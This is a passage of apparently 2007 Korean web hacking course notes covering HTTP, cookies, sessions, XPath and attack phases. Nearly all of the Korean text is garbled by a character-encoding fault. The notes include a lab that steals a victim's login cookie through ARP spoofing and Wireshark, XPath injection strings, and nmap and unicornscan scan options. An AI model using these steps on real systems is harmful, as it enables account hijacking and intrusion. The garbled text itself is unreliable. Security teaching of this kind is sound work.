web hacking 1
TRANSCRIPT
๋ํฅ
Vulnerability Stack for Web Security
๋คํธ์ํฌ ์์คํ ์ดํ๋ฆฌ์ผ์ด์ ๋ณด์ ์ ํญ์ ๋ค๋ฃฌ๋ค ๋ฐ์ดํฐ๋ฒ ์ด์ค ์น ์๋ฒ ์น ์ดํ๋ฆฌ์ผ์ด์
๊ฐ์ธ์ ๋ณด์ ์ถํ์ทจ์ฌ๊ฑด
์ฌํ๋งค๊ฐ ๊ฐ๋ฅํ๊ณ ๋จ๊ฐ๊ฐ ๋๋ค(์ฃผ๋ฏผ๋ฑ๋ก๋ฒํธ์์ฉ์นด๋๋ฒํธ)
(๊ณต๊ฒฉ๋ฐฉ๋ฒ์ ์ ์ฑ์คํฌ๋ฆฝํธ์์ฃผ์๋ฒ)-ifram ํ๊ทธ๋ ์ํํ๋ค
yahoocom hotmailcom (ํจ์ค์๋ ์์งํ ๋ ์์ฃผ ์ฌ์ฉํ๋ค) gmail ์ ํ์กฐ์ ์ด๋ค
ํ์ง๊ธฐ์ -wwwgeotcom 90์ด์ ํ์ง ํ์ฌ KISA์ ํ์กฐ
KISA๋ ์์ฒด์ ์ผ๋ก ํ์ง์์ง์ธ MCFinder๊ฐ๋ฐ(ํ์ฌ ๊ตฌ๊ธ(๋ณธ์ฌ)๊ณผ ํ์กฐ์ฒด์ ๊ตฌ์ถ ์งํ์ค)
์น ์ ์ฆ๊ฐ
์ด์ ๋ํ ๋์์ผ๋ก CAPCHA ๊ธฐ์ ๋ฐ์
End Point ์ทจ์ฝ์ ์ฆ๊ฐ
Web Clinet ๋ณด์์์ค ์ฆ๊ฐ End Point ๋ณด์ ์์ค ๊ธฐ์ ์ฆ๊ฐ ์ถ์ธ
๊ฐ์ธ์ ๋ณด ํ์ทจ ์ฌ๋ก
๊ฐ์ธ์ ๋ณด๋ฅผ ๋ ์ฃผ๊ณ ์ฌ๊ฐ์ง๊ณ ์ค๊ตญ์ ๋ฆฌ๋์ง ๊ฒ์๊ณต์ฅ์ ์ฐจ๋ฆผ(์คํ ๋ฐ) ์์ดํ ์ ์์ธ์์ ์์ฃผ ๋น์ผ ๊ฐ๊ฒฉ์ ํ๋ค
๊ฐ์ธํต์ฅ์ ์ด์ฉํด์ ์กํ (๊ตญ์ธ์ฒญ์์ ์ก์๋ค)
์ผ๋ณธ ๋๊ธฐ์ 43๊ฐ์ฌ ๊ฐ์ธ์ ๋ณด 863๋ง๊ฑด ์ ์ถ (์นด๋๋ฒํธ๊ณ์ข๋ฒํธ)
Web Security Statistics(2006WASC)
Cross-Site-Scripting(8557)
SQL Injection(2638)
์ ๋ณด๋์ถ(1570)
HTTP Response Splitting(976)
Path Traversal(119)
Web ์ทจ์ฝ์
ํ๊ท 67์ ์น ์๋ฒ ์น ์ดํ๋ฆฌ์ผ์ด์ ์๋ฒ ์น ํด๋ผ์ด์ถํธ๊ฐ ์ทจ์ฝ
์ ์ฒด ์ทจ์ฝ๊ตฎ์ค 63๊ฐ ๋ค์ 4๊ฐ ์ทจ์ฝ์ ์ค ํ๋์
-file inclusion
-sql injection
-XSS
-Directory Traversal
์ ์ฒด ์ทจ์ฝ๊ตฎ์ค 71๊ฐ ์ฝ๊ฒ expoit ๊ฐ๋ฅ
WebApp ์ทจ์ฝ์ ์ค php๊ฐ 30 ์ฐจ์ง
XSS19 SQLI17 File Inclusion17
Security Essential
Security
์ ๋ณด์์ฐ์ ๋ํ ๊ธฐ๋ฐ์ฑ ๊ฐ์ฉ์ฑ ๋ฌด๊ฒฐ์ฑ ์ ๋ณด์ฅ
์ ์ฑ ๋ฐ ์ ์ฐจ rarr ๋ฌผ๋ฆฌ์ ๋ณด์ (๊ฒฝ๊ณ์ ๋ณด์๋คํธ์ํฌ ๋ณด์์๋ฒ ๋ณด์์ดํ๋ฆฌ์ผ์ด์ ๋ณด์๋ฐ์ดํฐ ๋ณด์)
๊ถ๊ทน์ ์ ๋ณด์์ ๋ฐ์ดํฐ ๋ณด์(์ํธํ)
System Command
๊ณ์ ์ปจํธ๋กค(net usernet localgroup)
Netcat tftp ftp
ํฐ๋๋ง(plink)
Web Hacking 1์ผ์ฐจ
2007๋ 10์ 22์ผ ์์์ผ
์ค์ 930
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 1
ํฐ๋๋ง(plink)
ssh scp sftp (๋ฐ์ด๋๋ฆฌ๊ฐ ์๋ ์์คํค๋ก ํต์์ ํ๊ธฐ ๋๋ฌธ์)
Nmap
Windumptcpdumpwireshark
-Follow tcp stream
-Filter out
-Time ํ๊ธฐ Mark
-Analysis Static
-Sniffer Pro ํ์ฉ
DBMS Basic
-SELECTUPDATEINSERTDELETE
๊ธฐ๋ณธ์ฐ์ฐ์
WHRER๊ฒ์์กฐ๊ฑดHAVING๊ฒ์์กฐ๊ฑด
์งํฉ์ฐ์ฐ์
-CREATEDROP command
-ACID TRANSACTIONCOMMIT ๊ฐ๋
๋ฐฑ์ ์ ์ข ๋ฅ
-FULL Incremental Differential BACKUP
์น ๊ธฐ์ด
์น ๋ธ๋ผ์ฐ์ rarr ๋ฐฉํ๋ฒฝ rarr ์น ์๋ฒ rarr ์น ์ดํ๋ฆฌ์ผ์ด์ rarr ๋ฐ์ดํฐ๋ฒ ์ด์ค
http wwwsitecom showtablesasppage=1 amp name=username
(๋ฐฉํ๋ฒฝ)(์น์๋ฒ) (์น ์ดํ๋ฆฌ์ผ์ด์ ) (๋ฐ์ดํฐ๋ฒ ์ด์ค)
Special Char amp = +
Escape parser ampใ ก
amplt = lt (Less than) ํด๋ผ์ด์ถํธ์ธต์์ ์คํ์๋๊ฒ ํ๊ธฐ ์ํด์ ์ด๋ค
์๋๋ณ ๋ฑ์ฅ ๊ธฐ์
HTTP ํ๋กํ ์ฝ ๋ช ์ธ
HTML CSS
SCRIPTS JAVASCRIPTSVB
CGI C PERL
APPLET ACTIVE X ํด๋ผ์ด์ถํธ ์ธก ์๋ํ
HTTPS SSLTLS
์น์ดํ๋ฆฌ์ผ์ด์ ๋ฑ์ฅ ์๋ฒ์ธก ์๋ํ(ASPPHPJSP)
XML SHTML ๋ฐ์ดํฐ ์ ์ฅampํต์ ํฌ๋งท ์ค์
WEB SERVICEAJAX SOAP WSDL UDDI
CGI(Common Gate Interface)
-์น ์๋ฒ๋ก๋ถํฐ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์ ๋ณด๋ฅผ ์ ๋ฌํ๊ณ ์ ์ ํ ํํ๋ก ์ ๋ณด๋ฅผ ๋ธ๋ผ์ฐ์ ์๊ฒ ๋ฐํํ๊ธฐ ์ํ ํต์๊ท
์ฝ(ํ์ค)
-CGI๋ ์ถ์ด๊ฐ ์๋๋ผ ์ผ์ข ์ ํต์ ์ง์นจ์
-CGI์ง์ ์ถ์ด์คํฌ๋ฆฝํธ (PERL C C++ JAVA PHP ASP JSCRIPT)
-์น ํด๋ผ์ด์ถํธ๋ HTTPFORM์ ํํ๋ก ์น ์๋ฒ์๊ฒ ์ ๋ณด ์ ์ก
-์น ์๋ฒ๋ ํด๋ผ์ด์ถํธ๋ก๋ถํฐ ๋ค์ด์จ ์์ฒญ๊ณผ ํ๊ฒฝ๋ณ์ ์ ๊ฐ์ ์ฑ์ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์ ๋ฌ
-์คํฌ๋ฆฝํธ๋ ์ผ๋ฐ LANGUAGE๋ก CGI๋ก ์์ฑ์
Content-type texthtmlnn ํค๋ ๋ฐ๋์ ๋ฐํํ์ฌ์ผ ํจ
ํ๊ฒฝ๋ณ์
SERVER_SOFTWARE REMOTE_HOST
QUERY_STRING REMOTE_ADDR
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 2
QUERY_STRING REMOTE_ADDR
SERVER_PORT HTTP_USER_AGENT
REQUEST_METHOD
CONTENT_TYPE
CONTENT_LENGTH
HTTP
HTTP(HYPERTEXT TRANSFER PROTOCOL)
-TCP ๊ธฐ๋ฐ์ ํ๋กํ ์ฝ
-REQUEST ์ RESPONSE์ ๊ตฌ์กฐ๋ก ๋์ด ์์
-STATELESS ํ ํ๋กํ ์ฝ(REQUEST ์ RESPONSE๊ฐ ์ด๋ฃจ์ด์ง๋ฉด ์ ์์ด ์ข ๋ฃ๋จ (HTTP10)
๊ธฐ๋ณธ์ฉ์ด
URI (Uniform Resource Idenifier)
-์ธํฐ๋ท ์์ ์์์ ์๋ณํ๊ธฐ ์ํ ๋ฌธ์์ด
URL(Uniform Resource Locator)
-์์์ ์์น ์ ๋ณด๊ฐ ์ค์
-httpwwwsitecomsearchasp
URL(Uniform Resource Name)
-์์์ ์์น์ ์๊ด์์ด ์์ฒด์ ์ ๋ณด๊ฐ ์ค์ํ๋ค
-urnisbn021702452
HTTP ํ๋กํ ์ฝ ํต์ ๋ฐฉ์
HTTPResposeHeader
HTTPRequestHeader
HTTP 10
ํ๋์ ๋ฌธ์์ ๊ทธ๋ฆผ์ด ํ๋ ์๋๋ผ๋ ์ต์ด ํ ์คํธ๊ฐ ์ ์ฅ๋ HTTP ๋ฌธ์๋ฅผ ์ ์ก๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๊ทธ๋ฆผ์
๋ฐ๊ธฐ ์ํด ๋ค์ ์ฐ๊ฒฐ์ ์ค์ ํ ํ ๊ทธ๋ฆผ์ ์ ์ก๋ฐ๋๋ค
HTTP11
์ฐ์๋ ์ฐ๊ฒฐ ์์ฒญ์ด ์์ ๊ฒฝ์ฐ์ HTML ๋ฌธ์๋ฅผ ๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๋ค์ ์ฐ๊ฒฐ์ ์์ฒญํ์ง ์๊ณ ๋ฐ๋ก ๊ทธ๋ฆผ ํ์ผ
์ ์์ฒญํ๋ค
HTTP 11์ Method
Method ์ค๋ช
GET ์์์์ฒญ
POST ENTITY๋ฅผ ํฌํจํ ์์ ์์ฒญ
HEAD HTTP HEADER ์ ๋ณด๋ง ์์
TRACE Request์ ๋ฃจํ๋ฐฑ ํ ์คํธ
PUT URL์ ์์์ ์์ฑ
DELETE URL์ ์์์ ์ญ์
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 3
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
CONNECT ํฐ๋๋ง์ ๋ชฉ์ ์ผ๋ก ์ฐ๊ฒฐ์์ฒญ(Proxy ์ฐ๊ฒฐ)
GETPOST ๋ฉ์๋
GET๊ณผ POST๋ ์๋ฒ์ ์์์ ์์ฒญํ๋ ์ฌ์ฉ๋จ
GET๋ฐฉ์ POST๋ฐฉ์
์๋ฒ์ ์ ๋ฌํ๊ณ ์ํ๋ ๋ฐ์ดํฐ๋ฅผ URL ์ ํฌํจ์ํด
์ ์กํ ์ ์๋ ๋ฐ์ดํฐ๋์ด ์ ํ๋จ(2K4K)
์๋ฒ์ ์ ๋ฌํ ๋ฐ์ดํฐ๋ฅผ REQUEST Body์ ํฌํจ์ํด
๋ฐ์ดํฐ ์ ์ก๋์ ์ ํ์ด ์์(์๊ฐ์ ํ๊ฐ๋ )
GET loginaspuser_id=adminampuser_pass=1234
HOSTwwwsitecom
POST loginasp HTTP11
HOSTwwwsiteorg
User_id=admin user_pass=1234
get๋ฐฉ์(์น ๋ก๊ทธ๋ 8000์ ๊น์ง๋ง ์ ์ฅํ๋ค)
HEAD ๋ฉ์๋
TRACE ๋ฉ์๋
WEBDAV ๊ด๋ ฆ๋ฉ์๋
PUT
COPY
MOVE
DELETE
MAKECOL
PUT๋ฉ์๋ ์ฌ์ฉ์์
PUT HTTPWWWKISECCOMindex11html HTTP1O
HOSTWWWKISECCOM
Content-Length30
User-AgentBlaBla Client
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 4
User-AgentBlaBla Client
HTTP RESPONSE์ ์ฃผ์ ์๋ต ์ฝ๋
์ฃผ์ ์๋ต์ฝ๋
200 OK 400 BadRequest
201 Created 401 Unauthorized
202 Accepted 403 Forbidden
404 Not Found 301 Moved permanently
302 Found 500 Internal Server Error
HTTP ๊ด๋ ฆ ๊ธฐ์
์ฟ ํค
94๋ ๋ท์ค์ผ์ดํ์์ ๊ฐ๋ฐ
์๋ฒ๊ฐ ์์ฑํ๊ณ ํด๋ผ์ด์ถํธ์ ์ ์ฅ์ํค๋ ๋ฐฉ์
์ ์ฅ์๊ตฌ์ (Persistent๋์คํฌ)๋ฐ์๊ตฌ์ (Non-Persistent ๋ฉ๋ชจ๋ฆฌ)
๋ณด์๋ณด์๋น๋ณด์
์ ํํฌ๊ธฐ์ ํ(4k)๋ณ์์ ํ(2k)
ํ๋ฒ ์ ์ฅ๋ ์ฟ ํค๋ ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ์ด ์ง๋์ง ์๋ ํ ํด๋น ๋๋ฉ์ธ์ ์ ์์ ๋ธ๋ผ์ฐ์ ๊ฐ ์๋์ผ๋ก ํ์ฌํ์ฌ ์ ์ก
ํ๊ฒ ๋จ
์ฟ ํคํ์ผํํ์ฌ์ฉ์์ด๋ฆ์ ์ํ์ฌ์ดํธ
์ฟ ํคํ์ผ๋ด์ฉ๊ฐ๋ฐ์๊ฐ ์ค์ ํ๊ธฐ ๋๋ฆ
๋ํดํธ ๋๋ ํ ๋ฆฌ CDocuments and Setting์ฌ์ฉ์์ด๋ฆCookies
๊ธฐ๋ณธํฌ๋งท
Set-cookie
Name=value ์ฟ ํค์ ์ด๋ฆ
Expire=date ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ
Domain=domain ๋๋ฉ์ธ
Path=path ์ฟ ํค๋ฅผ ์ด์ฉํ์ฌ ์ ์์ฌ๋ฅํ URL
Secure ๋ณด์๋น๋ณด์์ค์
๊ด๋ ฆ ISSUE
์ฌ์ฉ์ ์์์กฐ์ ๋ฐ ์ค๋ํ ํ๋ก์ ๋ฑ์ ํตํ ๋ณ์กฐ๊ฐ๋ฅ
XSS๋ฑ์ ํตํ ํ์ธ์ ์ฟ ํคํ์ทจ
์ฌ์๊ณต๊ฒฉ์ ๋ฌด๋ฐฉ๋น
๋์๋ฐฉ์ ์ฟ ํค๋ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ธฐ๋ณธ ์ฒ ์น ์ฌ์ฉํ ๊ฒฝ์ฐ ๊ฒ์ฆ๋ ์ํธํ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ์ต์ํ์ ์ ๋ณด๋ง
์ ์ฅ ์ฟ ํค์ ๋ฌด๊ฒฝ์ค ๊ฒ์ฌ๋ฅผ ์ํด ์ ์ก๋๋(ํน์ ๋ณ์ ๊ฐ+TimeStamp)๋ฑ์ ์ ๋ณด๋ฅผ ํด์ํ ๊ฐ๊น์ง ๊ฐ์ด
์ ์ก ์๋ฒฝํ์ง ์์ผ๋ ์ธ์ ๊ณผ ๊ฐ์ด ๋ณํ์ ๋ณด์์ฑ ํฅ์
์ธ์ (SESSION)
HTTP์ ์ ์ธ์ ์ ๋ํ ์ฒ๋ฆฌ๋ฅผ ๋ด๋นํ๋ ๊ธฐ์
Server Side ๊ธฐ์ ๋ก HTTP์ Stateless ํ ํน์ฑ์ ๋ณด์ํ๊ธฐ ์ํด Uniq ํ ID๋ฅผ ์์ฑํ์ฌ ํ์ฌ ์ ์ํ ํด๋ผ์ด์ถํธ์๊ฒ
ํ๋นํด์ฃผ๊ณ ๊ธฐ์ตํ๋ ๋ฐฉ์
๊ณผ๊ฑฐ cookie์ ์ ์ฅํ๋ ๋ณ์ ๊ฐ ์ ์ด๊ธฐ ์ ์ ์ ํ๋นํ๊ฒ ๋จ
ํ๋นํ ๋ณ์๋ ์๋ฒ์ ์ ์ฅ๋๋ฉฐ ํด๋ผ์ด์ถํธ ์ธก ์๋ ์ธ์ ID๋ง ๋ถ์ฌ๋จ
์ฃผ๋ก Web Application Server ๋ Web Server ๋ฅผ ํ๋น ๋ฐ์ผ๋ฉฐ ์ด๋ ํด๋น ID์ ํน์ ์ ๋ณด๋ฅผ ์ ์ฅํ ์ ์์
ํด๋ผ์ด์ถํธ๋ ์๋ฒ์ ํต์์ SESSION ID๋ง ์ฃผ๊ณ ๋ฐ์
์ธ์ ID
WASWS ์ธ์ ID๋ณ์
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 5
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
